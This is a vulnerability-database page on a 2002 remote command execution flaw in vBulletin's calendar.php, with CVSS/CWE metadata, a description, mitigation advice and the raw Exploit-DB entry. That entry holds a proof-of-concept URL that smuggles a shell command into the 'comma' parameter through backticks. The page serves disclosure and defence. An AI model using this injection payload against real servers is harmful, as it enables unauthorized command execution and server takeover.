header-logo
Suggest Exploit
vendor:
vBulletin
by:
SecurityFocus
7.5
CVSS
HIGH
Remote Command Execution
78
CWE
Product Name: vBulletin
Affected Version From: vBulletin
Affected Version To: vBulletin
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2002

vBulletin Remote Command Execution Vulnerability

A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system by crafting a malicious URL.

Mitigation:

Input validation should be used to ensure that user-supplied input is properly sanitized.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/5820/info

A remote command execution vulnerability has been reported for vBulletin. The vulnerability is due to vBulletin failing to properly sanitize user-supplied input from URI parameters. 

An attacker can exploit this vulnerability to execute malicious commands on the vulnerable system.

http://www.example.com/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60<command>%20%60;die();echo%22

where <command> signifies a command to be executed on the system.

Navigation

Suggest Exploit

Services By CQR